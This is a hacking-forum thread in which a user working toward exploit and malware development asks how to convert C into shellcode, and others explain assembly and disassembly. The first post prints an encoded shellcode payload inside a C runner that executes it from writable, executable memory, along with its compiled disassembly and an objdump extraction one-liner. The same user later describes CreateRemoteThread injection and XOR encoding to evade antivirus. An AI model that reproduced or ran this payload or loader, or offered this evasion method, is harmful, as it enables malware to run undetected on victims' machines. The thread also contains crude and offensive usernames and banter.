
C to Binary. Disassembled C Binaries, and C to Asm Conversions

  1. #1
    Sophie Pedophile Tech Support
    So i've been messing around with some low level stuff for a bit now in order to become more proficient for reasons of exploit and malware development.

    Keep in mind that i come from a Python background so don't judge me too harshly as i am determined to git gud, senpais.

    I'd like to be able to write a kernel exploit, module or rootkit in C entirely at some point and maybe even write malicious firmware in Asm and C but in the meantime i am also learning the .NET suite of languages. However while that is going on, it so happens that i can cheat a little with Python and its `ctypes` lib as well by using it to inject shellcode, if i want. This is especially handy if i want to incorporate shellcode into a python based malware as either an in-script exploit or other added functionality.

    If i am feeling especially lazy i can have Metasploit generate appropriate shellcode for me. If i have some binary Asm file it's not too difficult to extract a hex representation of the binary data as well. That being said...

    Not being very proficient in Asm itself limits my ability to create custom shellcodes however. As an intermediary step i've sought to see if it were possible to go from a C file to Asm, with the resulting Asm then converted to shellcode as needed. The manner in which the shellcode is to be executed could be determined later.

    What i also want to find out is whether it's possible to have C source designed to launch shellcode, take that source, convert it to Asm or compile it and disassemble it later.

    I started out with this C program.


    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <string.h>
    #include <sys/mman.h>

    #define BUFSIZE 4096
    #define DEBUGGING 0

    /* Notice the shellcode already present, (protip don't run it) */

    char shellcode[] = "\xd9\xea\xd9\x74\x24\xf4\xbd\x8f\x1e\x9a\x87\x58\x29\xc9\xb1"
    "\x61\x31\x68\x18\x03\x68\x18\x83\xe8\x73\xfc\x6f\x6c\xd1\x30"
    "\x50\xf8\xd1\xb1\x51\x29\x4a\xe6\x60\x0e\x5d\xc6\x2f\x71\x5e"
    "\xc3\x2e\xb1\xe3\x34\x30\x40\x10\x05\xfa\xaf\xef\x4d\xa5\xf4"
    "\x7b\x51\x16\xe0\x5d\x96\x1f\x26\xea\x59\x1c\x4c\xa8\x5b\x24"
    "\xdf\x34\x5e\x84\x54\x74\x7e\xa9\x77\x76\x96\x72\x78\x89\x99"
    "\x2e\x0c\x3e\x42\x5c\x1e\xca\xec\xd5\x1b\x8b\xd5\x16\xdc\x0b"
    "\x16\x62\x78\x17\x9b\x68\x65\xac\xa7\x13\x14\xb6\xa5\xd0\x16"
    "\x7f\xcd\x77\x68\x7f\x0e\x78\x02\x3f\x02\xf3\x54\xa3\x91\x53"
    "\x5d\x50\xdd\x73\xd6\x66\x24\x3b\xf0\x13\xab\xab\x64\x80\x49"
    "\x87\x0d\x26\xef\xb0\xc8\x2e\x48\xea\xe7\x95\xfe\x85\x98\x8b"
    "\x29\xc1\x1f\xc4\x90\xfe\x48\xdc\xf9\x4f\x47\x88\xdd\x6d\x42"
    "\x7b\x57\x68\x19\x7c\x3e\x42\x21\x01\x39\xa5\xa8\x09\xeb\x4d"
    "\x4e\x9a\x4f\xb6\x73\x63\x9f\x3f\x49\xc2\x71\xcb\x02\x49\x71"
    "\x23\xf1\x4e\x8d\x4c\x5f\xe0\x35\x51\x80\x89\x5f\x7e\x4e\x61"
    "\x40\x7e\xae\x8e\x19\xec\x38\x16\x95\xc0\xde\xba\x35\x1d\xf4"
    "\x3c\x98\x77\x1d\x99\xad\x47\x10\xcb\xfc\x05\x39\xe8\x52\xc0"
    "\xbe\x86\x52\x14\xc1\x96\x05\x9f\x9c\x02\x55\x4c\x4e\xa9\x45"
    "\x77\x5e\x7f\xc7\xf5\xfc\x5b\xec\x56\xaf\xf1\xbe\x0a\x27\xd5"
    "\x3e\xa2\xb7\x45\xb4\xe9\xbf\x9a\x19\xee\xb4\x40\x9a\x9a\x68"
    "\x84\x5d\x4f\x1f\x12\xbf\x70\x20\x1a\x90\x18\x20\x0a\x10\xd9"
    "\x4a\x2b\x9d\x5f\x90\x2b\x9d\x5f\xf5\xa6\x1b\x4f\xf5\xb8\x23"
    "\x20\x9f\xb4\xae\x86\x57\x94\x3b\x5b\x68\xeb\xef\x0c\xa0\x13"
    "\x10\xcd\xbb\x4e\x14\x32\x68\xf9\xed\x4f\xc9\xf1\x0c\xb2\x5b"
    "\x6b\x0f\xb9\x39\x7b\xf0\x6e\x29\x06\xf1\x6e\x55\xa4\x0d\xcd"
    "\xaa\x7a\x0e\xb1\xaa\xc1\x0e\x73\xab\x99\x0e\x83\xab\x6f\x0f"
    "\xd7\xab\x29\x0f\x84\xab\xb5\x0f\x72\xac\xb5\x0f\xd7\x25\x50"
    "\x3e\x17\x75\xc7\x83\x9b\x76";

    int main(int argc, char* argv[])
    {
    size_t len;
    char *buf, *ptr;

    buf = mmap(NULL, BUFSIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
    ptr = buf;

    #if DEBUGGING
    ptr[0] = '\xcc';
    ptr++;
    #endif

    len = sizeof(shellcode);

    memcpy(ptr, shellcode, len);

    (*(void (*)()) buf)();

    return 0;
    }


    I compiled it down to assembly without actually assembling it, like so:


    gcc -S -o my_asm_output.s example.c


    This gave me the following as output.


    .file "example.c"
    .text
    .globl shellcode
    .data
    .align 32
    .type shellcode, @object
    .size shellcode, 413
    shellcode:
    .ascii "\331\352\331t$\364\275\217\036\232\207X)\311\261a1h\030\003h"
    .ascii "\030\203\350s\374ol\3210P\370\321\261Q)J\346`\016]\306/q^\303"
    .ascii ".\261\34340@\020\005\372\257\357M\245\364{Q\026\340]\226\037"
    .ascii "&\352Y\034L\250[$\3374^\204Tt~\251wv\226rx\211\231.\f>B\\\036"
    .ascii "\312\354\325\033\213\325\026\334\013\026bx\027\233he\254\247"
    .ascii "\023\024\266\245\320\026\177\315wh\177\016x\002?\002\363T\243"
    .ascii "\221S]P\335s\326f$;\360\023\253\253d\200I\207\r&\357\260\310"
    .string ".H\352\347\225\376\205\230\213)\301\037\304\220\376H\334\371OG\210\335mB{Wh\031|>B!\0019\245\250\t\353MN\232O\266sc\237?I\302q\313\002Iq#\361N\215L_\3405Q\200\211_~Na@~\256\216\031\3548\026\225\300\336\2725\035\364<\230w\035\231\255G\020\313\374\0059\350R\300\276\206R\024\301\226\005\237\234\002ULN\251Ew^\177\307\365\374[\354V\257\361\276\n'\325>\242\267E\264\351\277\232\031\356\264@\232\232h\204]O\037\022\277p \032\220\030 \n\020\331J+\235_\220+\235_\365\246\033O\365\270# \237\264\256\206W\224;[h\353\357\f\240\023\020\315\273N\0242h\371\355O\311\361\f\262[k\017\2719{\360n)\006\361nU\244\r\315\252z\016\261\252\301\016s\253\231\016\203\253o\017\327\253)\017\204\253\265\017r\254\265\017\327%P>\027u\307\203\233v"
    .text
    .globl main
    .type main, @function
    main:
    mov ebp, esp; for correct debugging
    .LFB6:
    .cfi_startproc
    pushq %rbp
    .cfi_def_cfa_offset 16
    .cfi_offset 6, -16
    movq %rsp, %rbp
    .cfi_def_cfa_register 6
    subq $48, %rsp
    movl %edi, -36(%rbp)
    movq %rsi, -48(%rbp)
    movl $0, %r9d
    movl $0, %r8d
    movl $34, %ecx
    movl $7, %edx
    movl $4096, %esi
    movl $0, %edi
    call mmap@PLT
    movq %rax, -24(%rbp)
    movq -24(%rbp), %rax
    movq %rax, -16(%rbp)
    movq $413, -8(%rbp)
    movq -8(%rbp), %rdx
    movq -16(%rbp), %rax
    leaq shellcode(%rip), %rsi
    movq %rax, %rdi
    call memcpy@PLT
    movq -24(%rbp), %rdx
    movl $0, %eax
    call *%rdx
    movl $0, %eax
    leave
    .cfi_def_cfa 7, 8
    ret
    .cfi_endproc
    .LFE6:
    .size main, .-main
    .ident "GCC: (Ubuntu 8.3.0-6ubuntu1) 8.3.0"
    .section .note.GNU-stack,"",@progbits


    Which i thought kind of looked like Asm, but the old shellcode from the C file looks all kinds of messed up. Not quite sure if that's how it's supposed to look. Because usually when i have a Binary Asm file it looks like below.


    xor eax,eax
    push eax
    push 0x22657841
    pop eax
    shr eax,0x08
    push eax
    mov eax,0x1d4f211f
    mov ebx,0x78614473
    xor eax,ebx


    Which i can then convert to shellcode with the following operations.


    objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'


    However since that didn't happen i straight up compiled the C file with `gcc -o my_asm_output example.c` which i then disassembled with `objdump -S --disassemble my_asm_output > my_asm_output.dump` which led to the code block you see below.



    my_asm_output: file format elf64-x86-64


    Disassembly of section .init:

    0000000000001000 <_init>:
    1000: 48 83 ec 08 sub $0x8,%rsp
    1004: 48 8b 05 dd 2f 00 00 mov 0x2fdd(%rip),%rax # 3fe8 <__gmon_start__>
    100b: 48 85 c0 test %rax,%rax
    100e: 74 02 je 1012 <_init+0x12>
    1010: ff d0 callq *%rax
    1012: 48 83 c4 08 add $0x8,%rsp
    1016: c3 retq

    Disassembly of section .plt:

    0000000000001020 <.plt>:
    1020: ff 35 92 2f 00 00 pushq 0x2f92(%rip) # 3fb8 <_GLOBAL_OFFSET_TABLE_+0x8>
    1026: ff 25 94 2f 00 00 jmpq *0x2f94(%rip) # 3fc0 <_GLOBAL_OFFSET_TABLE_+0x10>
    102c: 0f 1f 40 00 nopl 0x0(%rax)

    0000000000001030 <mmap@plt>:
    1030: ff 25 92 2f 00 00 jmpq *0x2f92(%rip) # 3fc8 <mmap@GLIBC_2.2.5>
    1036: 68 00 00 00 00 pushq $0x0
    103b: e9 e0 ff ff ff jmpq 1020 <.plt>

    0000000000001040 <memcpy@plt>:
    1040: ff 25 8a 2f 00 00 jmpq *0x2f8a(%rip) # 3fd0 <memcpy@GLIBC_2.14>
    1046: 68 01 00 00 00 pushq $0x1
    104b: e9 d0 ff ff ff jmpq 1020 <.plt>

    Disassembly of section .plt.got:

    0000000000001050 <__cxa_finalize@plt>:
    1050: ff 25 a2 2f 00 00 jmpq *0x2fa2(%rip) # 3ff8 <__cxa_finalize@GLIBC_2.2.5>
    1056: 66 90 xchg %ax,%ax

    Disassembly of section .text:

    0000000000001060 <_start>:
    1060: 31 ed xor %ebp,%ebp
    1062: 49 89 d1 mov %rdx,%r9
    1065: 5e pop %rsi
    1066: 48 89 e2 mov %rsp,%rdx
    1069: 48 83 e4 f0 and $0xfffffffffffffff0,%rsp
    106d: 50 push %rax
    106e: 54 push %rsp
    106f: 4c 8d 05 aa 01 00 00 lea 0x1aa(%rip),%r8 # 1220 <__libc_csu_fini>
    1076: 48 8d 0d 43 01 00 00 lea 0x143(%rip),%rcx # 11c0 <__libc_csu_init>
    107d: 48 8d 3d c1 00 00 00 lea 0xc1(%rip),%rdi # 1145 <main>
    1084: ff 15 56 2f 00 00 callq *0x2f56(%rip) # 3fe0 <__libc_start_main@GLIBC_2.2.5>
    108a: f4 hlt
    108b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)

    0000000000001090 <deregister_tm_clones>:
    1090: 48 8d 3d 29 31 00 00 lea 0x3129(%rip),%rdi # 41c0 <__TMC_END__>
    1097: 48 8d 05 22 31 00 00 lea 0x3122(%rip),%rax # 41c0 <__TMC_END__>
    109e: 48 39 f8 cmp %rdi,%rax
    10a1: 74 15 je 10b8 <deregister_tm_clones+0x28>
    10a3: 48 8b 05 2e 2f 00 00 mov 0x2f2e(%rip),%rax # 3fd8 <_ITM_deregisterTMCloneTable>
    10aa: 48 85 c0 test %rax,%rax
    10ad: 74 09 je 10b8 <deregister_tm_clones+0x28>
    10af: ff e0 jmpq *%rax
    10b1: 0f 1f 80 00 00 00 00 nopl 0x0(%rax)
    10b8: c3 retq
    10b9: 0f 1f 80 00 00 00 00 nopl 0x0(%rax)

    00000000000010c0 <register_tm_clones>:
    10c0: 48 8d 3d f9 30 00 00 lea 0x30f9(%rip),%rdi # 41c0 <__TMC_END__>
    10c7: 48 8d 35 f2 30 00 00 lea 0x30f2(%rip),%rsi # 41c0 <__TMC_END__>
    10ce: 48 29 fe sub %rdi,%rsi
    10d1: 48 c1 fe 03 sar $0x3,%rsi
    10d5: 48 89 f0 mov %rsi,%rax
    10d8: 48 c1 e8 3f shr $0x3f,%rax
    10dc: 48 01 c6 add %rax,%rsi
    10df: 48 d1 fe sar %rsi
    10e2: 74 14 je 10f8 <register_tm_clones+0x38>
    10e4: 48 8b 05 05 2f 00 00 mov 0x2f05(%rip),%rax # 3ff0 <_ITM_registerTMCloneTable>
    10eb: 48 85 c0 test %rax,%rax
    10ee: 74 08 je 10f8 <register_tm_clones+0x38>
    10f0: ff e0 jmpq *%rax
    10f2: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1)
    10f8: c3 retq
    10f9: 0f 1f 80 00 00 00 00 nopl 0x0(%rax)

    0000000000001100 <__do_global_dtors_aux>:
    1100: 80 3d b6 30 00 00 00 cmpb $0x0,0x30b6(%rip) # 41bd <_edata>
    1107: 75 2f jne 1138 <__do_global_dtors_aux+0x38>
    1109: 55 push %rbp
    110a: 48 83 3d e6 2e 00 00 cmpq $0x0,0x2ee6(%rip) # 3ff8 <__cxa_finalize@GLIBC_2.2.5>
    1111: 00
    1112: 48 89 e5 mov %rsp,%rbp
    1115: 74 0c je 1123 <__do_global_dtors_aux+0x23>
    1117: 48 8b 3d ea 2e 00 00 mov 0x2eea(%rip),%rdi # 4008 <__dso_handle>
    111e: e8 2d ff ff ff callq 1050 <__cxa_finalize@plt>
    1123: e8 68 ff ff ff callq 1090 <deregister_tm_clones>
    1128: c6 05 8e 30 00 00 01 movb $0x1,0x308e(%rip) # 41bd <_edata>
    112f: 5d pop %rbp
    1130: c3 retq
    1131: 0f 1f 80 00 00 00 00 nopl 0x0(%rax)
    1138: c3 retq
    1139: 0f 1f 80 00 00 00 00 nopl 0x0(%rax)

    0000000000001140 <frame_dummy>:
    1140: e9 7b ff ff ff jmpq 10c0 <register_tm_clones>

    0000000000001145 <main>:
    1145: 55 push %rbp
    1146: 48 89 e5 mov %rsp,%rbp
    1149: 48 83 ec 30 sub $0x30,%rsp
    114d: 89 7d dc mov %edi,-0x24(%rbp)
    1150: 48 89 75 d0 mov %rsi,-0x30(%rbp)
    1154: 41 b9 00 00 00 00 mov $0x0,%r9d
    115a: 41 b8 00 00 00 00 mov $0x0,%r8d
    1160: b9 22 00 00 00 mov $0x22,%ecx
    1165: ba 07 00 00 00 mov $0x7,%edx
    116a: be 00 10 00 00 mov $0x1000,%esi
    116f: bf 00 00 00 00 mov $0x0,%edi
    1174: e8 b7 fe ff ff callq 1030 <mmap@plt>
    1179: 48 89 45 e8 mov %rax,-0x18(%rbp)
    117d: 48 8b 45 e8 mov -0x18(%rbp),%rax
    1181: 48 89 45 f0 mov %rax,-0x10(%rbp)
    1185: 48 c7 45 f8 9d 01 00 movq $0x19d,-0x8(%rbp)
    118c: 00
    118d: 48 8b 55 f8 mov -0x8(%rbp),%rdx
    1191: 48 8b 45 f0 mov -0x10(%rbp),%rax
    1195: 48 8d 35 84 2e 00 00 lea 0x2e84(%rip),%rsi # 4020 <shellcode>
    119c: 48 89 c7 mov %rax,%rdi
    119f: e8 9c fe ff ff callq 1040 <memcpy@plt>
    11a4: 48 8b 55 e8 mov -0x18(%rbp),%rdx
    11a8: b8 00 00 00 00 mov $0x0,%eax
    11ad: ff d2 callq *%rdx
    11af: b8 00 00 00 00 mov $0x0,%eax
    11b4: c9 leaveq
    11b5: c3 retq
    11b6: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
    11bd: 00 00 00

    00000000000011c0 <__libc_csu_init>:
    11c0: 41 57 push %r15
    11c2: 49 89 d7 mov %rdx,%r15
    11c5: 41 56 push %r14
    11c7: 49 89 f6 mov %rsi,%r14
    11ca: 41 55 push %r13
    11cc: 41 89 fd mov %edi,%r13d
    11cf: 41 54 push %r12
    11d1: 4c 8d 25 d8 2b 00 00 lea 0x2bd8(%rip),%r12 # 3db0 <__frame_dummy_init_array_entry>
    11d8: 55 push %rbp
    11d9: 48 8d 2d d8 2b 00 00 lea 0x2bd8(%rip),%rbp # 3db8 <__init_array_end>
    11e0: 53 push %rbx
    11e1: 4c 29 e5 sub %r12,%rbp
    11e4: 48 83 ec 08 sub $0x8,%rsp
    11e8: e8 13 fe ff ff callq 1000 <_init>
    11ed: 48 c1 fd 03 sar $0x3,%rbp
    11f1: 74 1b je 120e <__libc_csu_init+0x4e>
    11f3: 31 db xor %ebx,%ebx
    11f5: 0f 1f 00 nopl (%rax)
    11f8: 4c 89 fa mov %r15,%rdx
    11fb: 4c 89 f6 mov %r14,%rsi
    11fe: 44 89 ef mov %r13d,%edi
    1201: 41 ff 14 dc callq *(%r12,%rbx,8)
    1205: 48 83 c3 01 add $0x1,%rbx
    1209: 48 39 dd cmp %rbx,%rbp
    120c: 75 ea jne 11f8 <__libc_csu_init+0x38>
    120e: 48 83 c4 08 add $0x8,%rsp
    1212: 5b pop %rbx
    1213: 5d pop %rbp
    1214: 41 5c pop %r12
    1216: 41 5d pop %r13
    1218: 41 5e pop %r14
    121a: 41 5f pop %r15
    121c: c3 retq
    121d: 0f 1f 00 nopl (%rax)

    0000000000001220 <__libc_csu_fini>:
    1220: c3 retq

    Disassembly of section .fini:

    0000000000001224 <_fini>:
    1224: 48 83 ec 08 sub $0x8,%rsp
    1228: 48 83 c4 08 add $0x8,%rsp
    122c: c3 retq


    Which as you can see, looks a lot better. Now i was thinking i could just take the two columns on the right:


    xor %ebx,%ebx
    nopl (%rax)
    mov %r15,%rdx
    mov %r14,%rsi
    mov %r13d,%edi
    callq *(%r12,%rbx,8)


    And run my crazy `objdump` operation on it to get to shellcode.

    Would that work?

    What can i do better?

    If it wouldn't work, could you point me in the right direction?

    Any tips and/or advice is appreciated.
  2. #2
    Sophie Pedophile Tech Support
    Originally posted by Grylls if you wanna get tropical i’ll put banana in your pussy

    I guess you could say we really put the passion in the passion-fruit.

    Joking aside, consider this post as my official request for Lanny to remove any posts that don't have anything to do with the topic at hand.
  3. #3
    gadzooks Dark Matter [keratinize my mild-tasting blossoming]
    Not a lot of people are particularly proficient with assembly. I mean, I fucked around with it a bit a couple years ago simply as an educational exercise. It actually does serve a pretty strong educational purpose. When you realize that there are really only a couple dozen commands (pretty much all simple arithmetic at that), combined with some very simple branching ("GOTO", in a sense - AKA, "calling functions"), as well as ye olde hexadecimal memory storage (for assigning variables, and also constructing much more complex data structures)... It's kinda fascinating to just realize that's what all programming is reduced to once it's compiled.

    That being said, assembly still looks mostly like gibberish to me. I recognize the general structure, as well as the ol' "MOV x to y register" type stuff.

    Originally posted by Sophie This gave me the following as output.


    .file "example.c"
    .text
    .globl shellcode
    .data
    .align 32
    .type shellcode, @object
    .size shellcode, 413
    .LFB6:
    .cfi_startproc
    pushq %rbp
    .cfi_def_cfa_offset 16
    .cfi_offset 6, -16
    movq %rsp, %rbp
    .cfi_def_cfa_register 6
    subq $48, %rsp
    movl %edi, -36(%rbp)
    movq %rsi, -48(%rbp)
    movl $0, %r9d
    movl $0, %r8d


    Which i thought kind of looked like Asm, but the old shellcode from the C file looks all kinds of messed up. Not quite sure if that's how it's supposed to look. Because usually when i have a Binary Asm file it looks like below.


    xor eax,eax
    push eax
    push 0x22657841
    pop eax
    shr eax,0x08
    push eax
    mov eax,0x1d4f211f
    mov ebx,0x78614473
    xor eax,ebx

    All I can say is that that first bit of code looks exactly like the kind of assembly code I wrote when I was experimenting with it.

    The latter snippet is definitely different (to me).

    But it might just be that the exact same code can just be represented quite differently, depending on what stage of the compilation/assembly OR disassembly it is at.

    Your shellcode might be different from what you expect it to look like for that reason alone.

    BUT, you might want to make sure you're running things in a sandboxed environment during initial testing. I just know I wouldn't really 100% trust some straight hexadecimal code, even if it was produced via a relatively trusted pipeline.
  4. #4
    aldra JIDF Controlled Opposition
    A couple of things:

    1. Shellcode is just raw machine code converted to hex to make it easier to type/compatible with ascii/utf8.

    2. There are different assembler syntax/notation standards. Compare NASM and MASM for example. The assembler interprets it into machine code similar to how a higher-level language does, so it's not surprising your C compiler's raw ASM output looks a little different to what you've seen elsewhere.

    3. (De?-)Compiling a C program to pure assembler instructions is going to be a lot bulkier and messier than writing the instructions by hand mostly because there's a lot of background stuff, memory management etc. that's included that you wouldn't normally care about.
  5. #5
    Sophie Pedophile Tech Support
    Originally posted by aldra A couple of things:

    1. Shellcode is just raw machine code converted to hex to make it easier to type/compatible with ascii/utf8.

    Yes i am aware, however, when it's in hex i can use Python's `ctypes` library to inject the shellcode via the CreateRemoteThread method, or other vector should one be available. This is especially useful, in the case of a malware that needs to launch an exploit for privilege escalation say, when you take into consideration that you can encode the shellcode with Polymorphic XOR just to name an encoding scheme, you're able to more easily evade AV solutions.

    Originally posted by aldra 2. There are different assembler syntax/notation standards. Compare NASM and MASM for example. The assembler interprets it into machine code similar to how a higher-level language does, so it's not surprising your C compiler's raw ASM output looks a little different to what you've seen elsewhere.

    3. (De?-)Compiling a C program to pure assembler instructions is going to be a lot bulkier and messier than writing the instructions by hand mostly because there's a lot of background stuff, memory management etc. that's included that you wouldn't normally care about.

    Right, the thing is though i am not proficient enough to write out Asm by hand. However, if i can write a function or operation in C and then take that function and transform it into shellcode that might be worthwhile.
  6. #6
    Lanny Bird of Courage
    Originally posted by Sophie Which i thought kind of looked like Asm, but the old shellcode from the C file looks all kinds of messed up. Not quite sure if that's how it's supposed to look. Because usually when i have a Binary Asm file it looks like below.

    That is assembly, the assembler directives (e.g. ".ascii") might be syntax you haven't seen before. As the name suggests, they direct the assembler to do some operation. Sometimes it's a shorthand for something that would be more cumbersome to write out in assembly or sometimes it controls the binary layout.

    One thing to note is that "binary ASM file" is a bit of an oxymoron. People aren't always super precise with the language, but "assembly" files are still text files and non-executable, only after they go through the assembler do you get an actual binary that can be executed. This is also why the output of gcc to assembly looks different from what a disassembler spits out. The ASM produced by a compiler can still use directives and symbolic names like "shellcode", because the assembler will resolve these to addresses. Once assembly and linking happens though, the symbolic names and directives are dropped and actual addresses are burned into the binary, the disassembler can't reverse these operations so you typically won't see meaningful labels like "shellcode" in the disassembly, even though they're present in the ASM source.
  7. #7
    aldra JIDF Controlled Opposition
    Originally posted by Sophie Right, the thing is though i am not proficient enough to write out Asm by hand. However, if i can write a function or operation in C and then take that function and transform it into shellcode that might be worthwhile.

    you can do that with a regular debugger but like I said, you'll end up getting a lot of 'junk' that you don't actually need and it'll blow out the size of your shellcode.
  8. #8
    Grylls Cum Looking Faggot [abrade this vocal tread-softly]
    Originally posted by Lanny That is assembly, the assembler directives (e.g. ".ascii") might be syntax you haven't seen before. As the name suggests, they direct the assembler to do some operation. Sometimes it's a shorthand for something that would be more cumbersome to write out in assembly or sometimes it controls the binary layout.

    One thing to note is that "binary ASM file" is a bit of an oxymoron. People aren't always super precise with the language, but "assembly" files are still text files and non-executable, only after they go through the assembler do you get an actual binary that can be executed. This is also why the output of gcc to assembly looks different from what a disassembler spits out. The ASM produced by a compiler can still use directives and symbolic names like "shellcode", because the assembler will resolve these to addresses. Once assembly and linking happens though, the symbolic names and directives are dropped and actual addresses are burned into the binary, the disassembler can't reverse these operations so you typically won't see meaningful labels like "shellcode" in the disassembly, even though they're present in the ASM source.

    you actually deleted my post?
  9. #9
    Lanny Bird of Courage
    Yes, and if you keep posting off-topic in this thread, including griping about your post being deleted, then I'm going to ban you too.
  10. #10
    Grylls Cum Looking Faggot [abrade this vocal tread-softly]
    sorry boss
  11. #11
    L41n Houston
    Originally posted by gadzooks When you realize that there are really only a couple dozen commands

    lol, maybe on a 6502...modern instruction sets have hundreds of instructions and are so beastly processors don't even run them directly a lot of times, they get converted to microcode.
  12. #12
    L41n Houston
    Originally posted by aldra 1. Shellcode is just raw machine code converted to hex to make it easier to type/compatible with ascii/utf8.

    Nitpick: that's not what shellcode *is* it's just the representation you often encounter it in.
  13. #13
    L41n Houston
    Originally posted by Sophie Right, the thing is though i am not proficient enough to write out Asm by hand. However, if i can write a function or operation in C and then take that function and transform it into shellcode that might be worthwhile.

    At the end of the day the best thing to do is just learn some assembly, the platform's ABI, etc and get comfortable with it.

    The whole point of shell code is to pop a shell basically, so all you need to figure out is the basics to manipulate memory, jump into/out of code, make some syscalls etc. You can sort of do what you're trying to do of course, but at the end of the day you're gonna be limited in what you can exploit without an understanding of low level fundamentals and the ability to handcraft assembly.


    Once you have the basics down and have your basic exploit you can jump into some code you wrote in a higher level language if you want.
  14. #14
    aldra JIDF Controlled Opposition
    Originally posted by L41n Nitpick: that's not what shellcode *is* it's just the representation you often encounter it in.

    yeah that's what I meant, just poor wording

    you're not spatulatzar or amie are you?
  15. #15
    L41n Houston
    Originally posted by aldra you're not spatulatzar or amie are you?

    No
  16. #16
    park police Tuskegee Airman
    ARM is the thing to learn nowadays
  17. #17
    Sophie Pedophile Tech Support
    Solid advice guys. Also sorry about the nomenclature, if i don't use the exact technical definitions of a term that's on me. I sometimes forget that a lot of security people aren't particularly gifted programmers.

    Guess that's me too, for now.

    Fundamentals. Sometimes i wonder if this would have been easier if i started off learning a low level language to begin with, but then again, learning that i can't cut corners anywhere in my pursuit of this has provided me with a mental clarity that i appreciate and need.
  18. #18
    park police Tuskegee Airman
    Originally posted by Sophie Sometimes i wonder if this would have been easier if i started off learning a low level language to begin with
    According to Jeff Duntemann and lifejunkie, and a bunch of other people, it would've been easier.
  19. #19
    L41n Houston
    Originally posted by Sophie Sometimes i wonder if this would have been easier if i started off learning a low level language to begin with

    Eh, maybe - maybe not. Knowing a higher level language can give you a point of reference when navigating the lower levels - especially today where there's so much going on in regard to exploits. Shell code is essentially just glue you use to seize total control of the state of the app and get it to do what you want. So the key to exploits is understanding how higher level functions on a specific platform map to lower level code...you really only need to understand a few basic concepts to get a grasp on it, and then you can dive in deeper when targeting something in particular.

    Experience in a higher level language gives you exposure to a lot of high level concepts about program logic and execution flow, you just have to go back and back fill how that stuff is actually being accomplished.

    I think playing around with C code and seeing what sort of asm the compiler spits out is a good start, it's just not gonna be how you actually construct your shell code.
  20. #20
    Admin African Astronaut
    I'm still stuck at Atmel.